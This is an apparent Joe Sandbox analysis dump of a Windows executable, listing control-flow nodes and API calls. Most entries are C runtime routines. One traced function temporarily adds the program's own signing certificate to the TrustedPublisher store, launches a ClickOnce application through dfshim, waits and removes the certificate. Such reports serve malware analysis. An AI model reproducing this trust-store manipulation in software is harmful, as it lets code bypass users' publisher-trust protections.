bb5943 TlsGetValue 5286->5287 5288 bb5937 _ValidateLocalCookies 5286->5288 5287->5288 5288->5223 5294 bb4819 __dosmaperr 5289->5294 5290 bb4859 5293 bb47f9 _free 14 API calls 5290->5293 5291 bb4844 HeapAlloc 5292 bb4452 5291->5292 5291->5294 5292->5228 5296 bb595a 5292->5296 5293->5292 5294->5290 5294->5291 5330 bb6992 5294->5330 5297 bb5741 __dosmaperr 5 API calls 5296->5297 5298 bb5981 5297->5298 5299 bb599c TlsSetValue 5298->5299 5300 bb5990 _ValidateLocalCookies 5298->5300 5299->5300 5300->5231 5344 bb426e 5301->5344 5452 bb6b14 5306->5452 5309 bb3f35 5311 bb3f3e IsProcessorFeaturePresent 5309->5311 5316 bb3f5c 5309->5316 5313 bb3f49 5311->5313 5312 bb3793 _abort 23 API calls 5314 bb3f66 5312->5314 5480 bb4573 5313->5480 5316->5312 5318 bb576d 5317->5318 5319 bb5771 __dosmaperr 5317->5319 5318->5319 5322 bb5791 5318->5322 5323 bb57dd 5318->5323 5319->5286 5321 bb579d GetProcAddress 5321->5319 5322->5319 5322->5321 5324 bb57fe LoadLibraryExW 5323->5324 5328 bb57f3 5323->5328 5325 bb581b GetLastError 5324->5325 5326 bb5833 5324->5326 5325->5326 5329 bb5826 LoadLibraryExW 5325->5329 5327 bb584a FreeLibrary 5326->5327 5326->5328 5327->5328 5328->5318 5329->5326 5333 bb69d6 5330->5333 5332 bb69a8 _ValidateLocalCookies 5332->5294 5334 bb69e2 ___scrt_is_nonwritable_in_current_image 5333->5334 5339 bb56e2 EnterCriticalSection 5334->5339 5336 bb69ed 5340 bb6a1f 5336->5340 5338 bb6a14 _abort 5338->5332 5339->5336 5343 bb572a LeaveCriticalSection 5340->5343 5342 bb6a26 5342->5338 5343->5342 5350 bb41ae 5344->5350 5346 bb4292 5347 bb421e 5346->5347 5361 bb40b2 5347->5361 5349 bb4242 5349->5238 5351 bb41ba ___scrt_is_nonwritable_in_current_image 5350->5351 5356 bb56e2 EnterCriticalSection 5351->5356 5353 bb41c4 5357 bb41ea 5353->5357 5355 bb41e2 _abort 5355->5346 5356->5353 5360 bb572a LeaveCriticalSection 5357->5360 5359 bb41f4 5359->5355 5360->5359 5362 bb40be ___scrt_is_nonwritable_in_current_image 5361->5362 5369 bb56e2 EnterCriticalSection 5362->5369 5364 bb40c8 5370 
bb43d9 5364->5370 5366 bb40e0 5374 bb40f6 5366->5374 5368 bb40ee _abort 5368->5349 5369->5364 5371 bb440f __fassign 5370->5371 5372 bb43e8 __fassign 5370->5372 5371->5366 5372->5371 5377 bb6507 5372->5377 5451 bb572a LeaveCriticalSection 5374->5451 5376 bb4100 5376->5368 5378 bb6587 5377->5378 5381 bb651d 5377->5381 5380 bb4869 _free 15 API calls 5378->5380 5404 bb65d5 5378->5404 5382 bb65a9 5380->5382 5381->5378 5385 bb4869 _free 15 API calls 5381->5385 5386 bb6550 5381->5386 5383 bb4869 _free 15 API calls 5382->5383 5387 bb65bc 5383->5387 5384 bb65e3 5389 bb6643 5384->5389 5402 bb4869 15 API calls _free 5384->5402 5390 bb6545 5385->5390 5391 bb4869 _free 15 API calls 5386->5391 5403 bb6572 5386->5403 5392 bb4869 _free 15 API calls 5387->5392 5388 bb4869 _free 15 API calls 5393 bb657c 5388->5393 5395 bb4869 _free 15 API calls 5389->5395 5405 bb6078 5390->5405 5397 bb6567 5391->5397 5398 bb65ca 5392->5398 5394 bb4869 _free 15 API calls 5393->5394 5394->5378 5399 bb6649 5395->5399 5433 bb6176 5397->5433 5401 bb4869 _free 15 API calls 5398->5401 5399->5371 5401->5404 5402->5384 5403->5388 5445 bb667a 5404->5445 5406 bb6089 5405->5406 5432 bb6172 5405->5432 5407 bb609a 5406->5407 5408 bb4869 _free 15 API calls 5406->5408 5409 bb60ac 5407->5409 5411 bb4869 _free 15 API calls 5407->5411 5408->5407 5410 bb60be 5409->5410 5412 bb4869 _free 15 API calls 5409->5412 5413 bb60d0 5410->5413 5414 bb4869 _free 15 API calls 5410->5414 5411->5409 5412->5410 5415 bb60e2 5413->5415 5416 bb4869 _free 15 API calls 5413->5416 5414->5413 5417 bb4869 _free 15 API calls 5415->5417 5421 bb60f4 5415->5421 5416->5415 5417->5421 5418 bb4869 _free 15 API calls 5420 bb6106 5418->5420 5419 bb6118 5423 bb612a 5419->5423 5424 bb4869 _free 15 API calls 5419->5424 5420->5419 5422 bb4869 _free 15 API calls 5420->5422 5421->5418 5421->5420 5422->5419 5425 bb613c 5423->5425 5427 bb4869 _free 15 API calls 5423->5427 5424->5423 5426 bb614e 5425->5426 5428 bb4869 _free 15 API calls 5425->5428 5429 bb6160 
5426->5429 5430 bb4869 _free 15 API calls 5426->5430 5427->5425 5428->5426 5431 bb4869 _free 15 API calls 5429->5431 5429->5432 5430->5429 5431->5432 5432->5386 5434 bb6183 5433->5434 5444 bb61db 5433->5444 5435 bb6193 5434->5435 5437 bb4869 _free 15 API calls 5434->5437 5436 bb61a5 5435->5436 5438 bb4869 _free 15 API calls 5435->5438 5439 bb4869 _free 15 API calls 5436->5439 5441 bb61b7 5436->5441 5437->5435 5438->5436 5439->5441 5440 bb61c9 5443 bb4869 _free 15 API calls 5440->5443 5440->5444 5441->5440 5442 bb4869 _free 15 API calls 5441->5442 5442->5440 5443->5444 5444->5403 5446 bb6687 5445->5446 5450 bb66a5 5445->5450 5447 bb621b __fassign 15 API calls 5446->5447 5446->5450 5448 bb669f 5447->5448 5449 bb4869 _free 15 API calls 5448->5449 5449->5450 5450->5384 5451->5376 5484 bb6a82 5452->5484 5455 bb6b6f 5456 bb6b7b _abort 5455->5456 5457 bb6ba2 _abort 5456->5457 5458 bb6ba8 _abort 5456->5458 5498 bb44a8 GetLastError 5456->5498 5457->5458 5460 bb6bf4 5457->5460 5464 bb6bd7 _abort 5457->5464 5466 bb6c20 5458->5466 5520 bb56e2 EnterCriticalSection 5458->5520 5461 bb47f9 _free 15 API calls 5460->5461 5462 bb6bf9 5461->5462 5517 bb473d 5462->5517 5464->5309 5467 bb6c7f 5466->5467 5469 bb6c77 5466->5469 5477 bb6caa 5466->5477 5521 bb572a LeaveCriticalSection 5466->5521 5467->5477 5522 bb6b66 5467->5522 5472 bb3793 _abort 23 API calls 5469->5472 5472->5467 5475 bb4424 _abort 33 API calls 5478 bb6d0d 5475->5478 5476 bb6b66 _abort 33 API calls 5476->5477 5525 bb6d2f 5477->5525 5478->5464 5479 bb4424 _abort 33 API calls 5478->5479 5479->5464 5481 bb458f _abort 5480->5481 5482 bb45bb IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5481->5482 5483 bb468c _abort _ValidateLocalCookies 5482->5483 5483->5316 5487 bb6a28 5484->5487 5486 bb3f29 5486->5309 5486->5455 5488 bb6a34 ___scrt_is_nonwritable_in_current_image 5487->5488 5493 bb56e2 EnterCriticalSection 5488->5493 5490 bb6a42 5494 bb6a76 5490->5494 5492 bb6a69 _abort 5492->5486 5493->5490 5497 
bb572a LeaveCriticalSection 5494->5497 5496 bb6a80 5496->5492 5497->5496 5499 bb44c7 5498->5499 5500 bb44c1 5498->5500 5502 bb480c __dosmaperr 12 API calls 5499->5502 5504 bb451e SetLastError 5499->5504 5501 bb5904 __dosmaperr 6 API calls 5500->5501 5501->5499 5503 bb44d9 5502->5503 5505 bb44e1 5503->5505 5507 bb595a __dosmaperr 6 API calls 5503->5507 5506 bb4527 5504->5506 5508 bb4869 _free 12 API calls 5505->5508 5506->5457 5509 bb44f6 5507->5509 5510 bb44e7 5508->5510 5509->5505 5511 bb44fd 5509->5511 5512 bb4515 SetLastError 5510->5512 5513 bb4296 __dosmaperr 12 API calls 5511->5513 5512->5506 5514 bb4508 5513->5514 5515 bb4869 _free 12 API calls 5514->5515 5516 bb450e 5515->5516 5516->5504 5516->5512 5529 bb46c2 5517->5529 5519 bb4749 5519->5464 5520->5466 5521->5469 5523 bb4424 _abort 33 API calls 5522->5523 5524 bb6b6b 5523->5524 5524->5476 5526 bb6d35 5525->5526 5528 bb6cfe 5525->5528 5541 bb572a LeaveCriticalSection 5526->5541 5528->5464 5528->5475 5528->5478 5530 bb44a8 __dosmaperr 15 API calls 5529->5530 5531 bb46d8 5530->5531 5535 bb46e6 _ValidateLocalCookies 5531->5535 5537 bb474d IsProcessorFeaturePresent 5531->5537 5533 bb473c 5534 bb46c2 _abort 21 API calls 5533->5534 5536 bb4749 5534->5536 5535->5519 5536->5519 5538 bb4758 5537->5538 5539 bb4573 _abort 3 API calls 5538->5539 5540 bb476d GetCurrentProcess TerminateProcess 5539->5540 5540->5533 5541->5528 5542->5248 5546 bb572a LeaveCriticalSection 5543->5546 5545 bb52e1 5545->5248 5546->5545 5548 bb3f85 5547->5548 5549 bb3f8f 5547->5549 5548->5253 5548->5254 5549->5548 5550 bb4424 _abort 33 API calls 5549->5550 5551 bb3fb0 5550->5551 5555 bb72d1 5551->5555 5556 bb72e4 5555->5556 5558 bb3fc9 5555->5558 5556->5558 5563 bb6754 5556->5563 5559 bb72fe 5558->5559 5560 bb7311 5559->5560 5562 bb7326 5559->5562 5561 bb5249 __fassign 33 API calls 5560->5561 5560->5562 5561->5562 5562->5548 5564 bb6760 ___scrt_is_nonwritable_in_current_image 5563->5564 5565 bb4424 _abort 33 API calls 5564->5565 5566 bb6769 
5565->5566 5569 bb67b7 _abort 5566->5569 5575 bb56e2 EnterCriticalSection 5566->5575 5568 bb6787 5576 bb67cb 5568->5576 5569->5558 5574 bb3f24 _abort 33 API calls 5574->5569 5575->5568 5577 bb67d9 __fassign 5576->5577 5579 bb679b 5576->5579 5578 bb6507 __fassign 15 API calls 5577->5578 5577->5579 5578->5579 5580 bb67ba 5579->5580 5583 bb572a LeaveCriticalSection 5580->5583 5582 bb67ae 5582->5569 5582->5574 5583->5582 5588 bb4fd0 5584->5588 5591 bb507a _ValidateLocalCookies 5584->5591 5586 bb5031 5604 bb7cd1 5586->5604 5592 bb634d 5588->5592 5590 bb7cd1 38 API calls 5590->5591 5591->5269 5593 bb3f72 __fassign 33 API calls 5592->5593 5594 bb636d MultiByteToWideChar 5593->5594 5596 bb63ab 5594->5596 5597 bb6443 _ValidateLocalCookies 5594->5597 5598 bb62ff 16 API calls 5596->5598 5601 bb63cc _abort __alloca_probe_16 5596->5601 5597->5586 5598->5601 5599 bb643d 5609 bb646a 5599->5609 5601->5599 5602 bb6411 MultiByteToWideChar 5601->5602 5602->5599 5603 bb642d GetStringTypeW 5602->5603 5603->5599 5605 bb3f72 __fassign 33 API calls 5604->5605 5606 bb7ce4 5605->5606 5613 bb7ab4 5606->5613 5608 bb5052 5608->5590 5610 bb6487 5609->5610 5611 bb6476 5609->5611 5610->5597 5611->5610 5612 bb4869 _free 15 API calls 5611->5612 5612->5610 5614 bb7acf 5613->5614 5615 bb7af5 MultiByteToWideChar 5614->5615 5616 bb7b1f 5615->5616 5617 bb7ca9 _ValidateLocalCookies 5615->5617 5619 bb62ff 16 API calls 5616->5619 5620 bb7b40 __alloca_probe_16 5616->5620 5617->5608 5618 bb7b89 MultiByteToWideChar 5621 bb7ba2 5618->5621 5633 bb7bf5 5618->5633 5619->5620 5620->5618 5620->5633 5638 bb5a15 5621->5638 5623 bb646a __freea 15 API calls 5623->5617 5624 bb7bb9 5625 bb7bcc 5624->5625 5626 bb7c04 5624->5626 5624->5633 5629 bb5a15 6 API calls 5625->5629 5625->5633 5627 bb62ff 16 API calls 5626->5627 5631 bb7c25 __alloca_probe_16 5626->5631 5627->5631 5628 bb7c9a 5630 bb646a __freea 15 API calls 5628->5630 5629->5633 5630->5633 5631->5628 5632 bb5a15 6 API calls 5631->5632 5634 bb7c79 5632->5634 
5633->5623 5634->5628 5635 bb7c88 WideCharToMultiByte 5634->5635 5635->5628 5636 bb7cc8 5635->5636 5637 bb646a __freea 15 API calls 5636->5637 5637->5633 5639 bb5741 __dosmaperr 5 API calls 5638->5639 5640 bb5a3c 5639->5640 5643 bb5a45 _ValidateLocalCookies 5640->5643 5644 bb5a9d 5640->5644 5642 bb5a85 LCMapStringW 5642->5643 5643->5624 5645 bb5741 __dosmaperr 5 API calls 5644->5645 5646 bb5ac4 _ValidateLocalCookies 5645->5646 5646->5642 5648 bb4d5d ___scrt_is_nonwritable_in_current_image 5647->5648 5655 bb56e2 EnterCriticalSection 5648->5655 5650 bb4d67 5656 bb4dbc 5650->5656 5654 bb4d80 _abort 5654->5283 5655->5650 5668 bb54dc 5656->5668 5658 bb4e0a 5659 bb54dc 21 API calls 5658->5659 5660 bb4e26 5659->5660 5661 bb54dc 21 API calls 5660->5661 5662 bb4e44 5661->5662 5663 bb4d74 5662->5663 5664 bb4869 _free 15 API calls 5662->5664 5665 bb4d88 5663->5665 5664->5663 5682 bb572a LeaveCriticalSection 5665->5682 5667 bb4d92 5667->5654 5669 bb54ed 5668->5669 5672 bb54e9 5668->5672 5670 bb54f4 5669->5670 5674 bb5507 _abort 5669->5674 5671 bb47f9 _free 15 API calls 5670->5671 5673 bb54f9 5671->5673 5672->5658 5675 bb473d _abort 21 API calls 5673->5675 5674->5672 5676 bb553e 5674->5676 5677 bb5535 5674->5677 5675->5672 5676->5672 5679 bb47f9 _free 15 API calls 5676->5679 5678 bb47f9 _free 15 API calls 5677->5678 5680 bb553a 5678->5680 5679->5680 5681 bb473d _abort 21 API calls 5680->5681 5681->5672 5682->5667 5684 bb3f72 __fassign 33 API calls 5683->5684 5685 bb5571 5684->5685 5685->5076 5687 bb356a _abort 5686->5687 5688 bb3582 5687->5688 5701 bb36b8 GetModuleHandleW 5687->5701 5708 bb56e2 EnterCriticalSection 5688->5708 5694 bb358a 5700 bb35ff _abort 5694->5700 5709 bb3c97 5694->5709 5695 bb3671 _abort 5695->5107 5712 bb3668 5700->5712 5702 bb3576 5701->5702 5702->5688 5703 bb36fc GetModuleHandleExW 5702->5703 5704 bb3726 GetProcAddress 5703->5704 5705 bb373b 5703->5705 5704->5705 5706 bb3758 _ValidateLocalCookies 5705->5706 5707 bb374f FreeLibrary 5705->5707 5706->5688 
5707->5706 5708->5694 5723 bb39d0 5709->5723 5743 bb572a LeaveCriticalSection 5712->5743 5714 bb3641 5714->5695 5715 bb3677 5714->5715 5744 bb5b1f 5715->5744 5717 bb3681 5718 bb36a5 5717->5718 5719 bb3685 GetPEB 5717->5719 5720 bb36fc _abort 3 API calls 5718->5720 5719->5718 5721 bb3695 GetCurrentProcess TerminateProcess 5719->5721 5722 bb36ad ExitProcess 5720->5722 5721->5718 5726 bb397f 5723->5726 5725 bb39f4 5725->5700 5727 bb398b ___scrt_is_nonwritable_in_current_image 5726->5727 5734 bb56e2 EnterCriticalSection 5727->5734 5729 bb3999 5735 bb3a20 5729->5735 5731 bb39a6 5739 bb39c4 5731->5739 5733 bb39b7 _abort 5733->5725 5734->5729 5736 bb3a48 5735->5736 5737 bb3a40 _ValidateLocalCookies 5735->5737 5736->5737 5738 bb4869 _free 15 API calls 5736->5738 5737->5731 5738->5737 5742 bb572a LeaveCriticalSection 5739->5742 5741 bb39ce 5741->5733 5742->5741 5743->5714 5745 bb5b44 5744->5745 5747 bb5b3a _ValidateLocalCookies 5744->5747 5746 bb5741 __dosmaperr 5 API calls 5745->5746 5746->5747 5747->5717 6740 bb324d 6741 bb522b 46 API calls 6740->6741 6742 bb325f 6741->6742 6751 bb561e GetEnvironmentStringsW 6742->6751 6746 bb4869 _free 15 API calls 6748 bb329f 6746->6748 6747 bb3275 6749 bb4869 _free 15 API calls 6747->6749 6750 bb326a 6749->6750 6750->6746 6752 bb5635 6751->6752 6762 bb5688 6751->6762 6753 bb563b WideCharToMultiByte 6752->6753 6756 bb5657 6753->6756 6753->6762 6754 bb3264 6754->6750 6763 bb32a5 6754->6763 6755 bb5691 FreeEnvironmentStringsW 6755->6754 6757 bb62ff 16 API calls 6756->6757 6758 bb565d 6757->6758 6759 bb5664 WideCharToMultiByte 6758->6759 6760 bb567a 6758->6760 6759->6760 6761 bb4869 _free 15 API calls 6760->6761 6761->6762 6762->6754 6762->6755 6764 bb32ba 6763->6764 6765 bb480c __dosmaperr 15 API calls 6764->6765 6770 bb32e1 6765->6770 6766 bb3345 6767 bb4869 _free 15 API calls 6766->6767 6768 bb335f 6767->6768 6768->6747 6769 bb480c __dosmaperr 15 API calls 6769->6770 6770->6766 6770->6769 6771 bb3347 6770->6771 6776 bb3369 6770->6776 
6778 bb4869 _free 15 API calls 6770->6778 6780 bb3eca 6770->6780 6772 bb3376 15 API calls 6771->6772 6774 bb334d 6772->6774 6775 bb4869 _free 15 API calls 6774->6775 6775->6766 6777 bb474d _abort 6 API calls 6776->6777 6779 bb3375 6777->6779 6778->6770 6781 bb3ee5 6780->6781 6782 bb3ed7 6780->6782 6783 bb47f9 _free 15 API calls 6781->6783 6782->6781 6787 bb3efc 6782->6787 6784 bb3eed 6783->6784 6785 bb473d _abort 21 API calls 6784->6785 6786 bb3ef7 6785->6786 6786->6770 6787->6786 6788 bb47f9 _free 15 API calls 6787->6788 6788->6784 6109 bb9ec3 6110 bb9ed9 6109->6110 6111 bb9ecd 6109->6111 6111->6110 6112 bb9ed2 CloseHandle 6111->6112 6112->6110 6789 bb1442 6790 bb1a6a GetModuleHandleW 6789->6790 6791 bb144a 6790->6791 6792 bb144e 6791->6792 6793 bb1480 6791->6793 6794 bb1459 6792->6794 6798 bb3775 6792->6798 6795 bb3793 _abort 23 API calls 6793->6795 6797 bb1488 6795->6797 6799 bb355e _abort 23 API calls 6798->6799 6800 bb3780 6799->6800 6800->6794 6801 bb3d41 6804 bb341b 6801->6804 6805 bb342a 6804->6805 6806 bb3376 15 API calls 6805->6806 6807 bb3444 6806->6807 6808 bb3376 15 API calls 6807->6808 6809 bb344f 6808->6809 6580 bb3400 6581 bb3418 6580->6581 6582 bb3412 6580->6582 6583 bb3376 15 API calls 6582->6583 6583->6581 6584 bb1e00 6585 bb1e1e ___except_validate_context_record _ValidateLocalCookies __IsNonwritableInCurrentImage 6584->6585 6586 bb1e9e _ValidateLocalCookies 6585->6586 6589 bb2340 RtlUnwind 6585->6589 6588 bb1f27 _ValidateLocalCookies 6589->6588 5944 bb3d86 5945 bb1f7d ___scrt_uninitialize_crt 7 API calls 5944->5945 5946 bb3d8d 5945->5946 6810 bb9146 IsProcessorFeaturePresent 6113 bb98c5 6115 bb98ed 6113->6115 6114 bb9925 6115->6114 6116 bb991e 6115->6116 6117 bb9917 6115->6117 6122 bb9980 6116->6122 6118 bb9997 16 API calls 6117->6118 6120 bb991c 6118->6120 6123 bb99a0 6122->6123 6124 bba06f __startOneArgErrorHandling 16 API calls 6123->6124 6125 bb9923 6124->6125

Control-flow Graph

APIs
• LocalAlloc.KERNEL32(00000000,00000104), ref: 00BB1016
• GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 00BB1025
• CertOpenSystemStoreA.CRYPT32(00000000,TrustedPublisher), ref: 00BB1032
• LocalAlloc.KERNELBASE(00000000,00040000), ref: 00BB1057
• LocalAlloc.KERNEL32(00000000,00040000), ref: 00BB1063
• CryptQueryObject.CRYPT32(00000001,00000000,00000400,00000002,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00BB1082
• CryptMsgGetParam.CRYPT32(?,0000000B,00000000,?,?), ref: 00BB10B2
• LocalAlloc.KERNEL32(00000000,?), ref: 00BB10C5
• LocalAlloc.KERNEL32(00000000,00002000), ref: 00BB10F4
• CryptMsgGetParam.CRYPT32(?,0000000C,00000000,00000000,00002000), ref: 00BB110A
• CertCreateCertificateContext.CRYPT32(00000001,00000000,00002000), ref: 00BB111A
• CertAddCertificateContextToStore.CRYPT32(?,00000000,00000001,00000000), ref: 00BB112D
• CertFreeCertificateContext.CRYPT32(00000000), ref: 00BB1134
                                                                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000), ref: 00BB113E
                                                                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000), ref: 00BB115D
                                                                                                                                                                                                                                                          • CryptMsgGetParam.CRYPT32(?,00000009,00000000,00000000,00040000), ref: 00BB116E
                                                                                                                                                                                                                                                          • CryptMsgGetParam.CRYPT32(?,0000000A,00000000,?,00040000), ref: 00BB1182
                                                                                                                                                                                                                                                          • CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,00000000,?), ref: 00BB1198
                                                                                                                                                                                                                                                          • CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,?,?), ref: 00BB11A9
                                                                                                                                                                                                                                                          • LoadLibraryA.KERNELBASE(dfshim), ref: 00BB11BA
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,ShOpenVerbApplicationW), ref: 00BB11C6
                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00009C40), ref: 00BB11E8
                                                                                                                                                                                                                                                          • CertDeleteCertificateFromStore.CRYPT32(?), ref: 00BB120B
                                                                                                                                                                                                                                                          • CertCloseStore.CRYPT32(?,00000000), ref: 00BB121A
                                                                                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 00BB1223
                                                                                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 00BB1228
                                                                                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 00BB122D
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Local$Cert$Free$AllocCrypt$CertificateParamStore$Context$AttributeFind$AddressCloseCreateDeleteFileFromLibraryLoadModuleNameObjectOpenProcQuerySleepSystem
                                                                                                                                                                                                                                                          • String ID: 1.3.6.1.4.1.311.4.1.1$ShOpenVerbApplicationW$TrustedPublisher$dfshim
                                                                                                                                                                                                                                                          • API String ID: 335784236-860318880
                                                                                                                                                                                                                                                          • Opcode ID: 99414ae5810113a8caf731f6008b05d3dc74bd40d49be439e2144c4d14a0ad3d
                                                                                                                                                                                                                                                          • Instruction ID: 2ba58986e4ac0ccb41170c986dd1dc11a4ad0882865ce8d97a2db404b3e2382e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 99414ae5810113a8caf731f6008b05d3dc74bd40d49be439e2144c4d14a0ad3d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C616E72A40219AFEB11AB94DC45FBFBBB5EF48B50F500154F614B7290CBF199018BA4
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00BB192B
                                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 00BB19F7
                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00BB1A10
                                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00BB1A1A
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 254469556-0
                                                                                                                                                                                                                                                          • Opcode ID: 7391cbae4ade0bf2f596d00860a9c694f8ad11b6479c5124b1618bb9cab65ee0
                                                                                                                                                                                                                                                          • Instruction ID: df690e9f10e981cd687d914c831dede45afbb0ceca49184cb7ca772a85bbb470
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7391cbae4ade0bf2f596d00860a9c694f8ad11b6479c5124b1618bb9cab65ee0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D311875D012189BDB20EF64D989BDDBBF8AF08300F5041EAE40CAB250EBB09A85CF45
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00BB466B
                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00BB4675
                                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00BB4682
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3906539128-0
                                                                                                                                                                                                                                                          • Opcode ID: 0f24347fc7f2738f1563a1e7f98f860b3ab37e985fff685a30baad6691b6faba
                                                                                                                                                                                                                                                          • Instruction ID: d4dd384d06cdab5f50e2a943c37dac373a0db5c19084371f7453d7de04dc84d7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f24347fc7f2738f1563a1e7f98f860b3ab37e985fff685a30baad6691b6faba
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE31B3749012189BCB21DF68D989BDDBBF8FF08310F5046EAE41CA7251EBB09B858F45
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,00BB364D,?,00BC02E0,0000000C,00BB37A4,?,00000002,00000000,?,00BB3F66,00000003,00BB209F,00BB1AFC), ref: 00BB3698
                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,00BB364D,?,00BC02E0,0000000C,00BB37A4,?,00000002,00000000,?,00BB3F66,00000003,00BB209F,00BB1AFC), ref: 00BB369F
                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00BB36B1
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                                                                                          • Opcode ID: 430359ce93ba1c5e62e3697527ee9c338933ede43e71b9cbb56acc476842aefb
                                                                                                                                                                                                                                                          • Instruction ID: ca418b207f1ac197ee77c499afab023dcd8386d8a3cd9b57cbe549b748a6148f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 430359ce93ba1c5e62e3697527ee9c338933ede43e71b9cbb56acc476842aefb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43E0B631014548AFCF21BF54DD09EAA3BA9EF40745F404194FA569B231DFF5DE42CA50
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmp
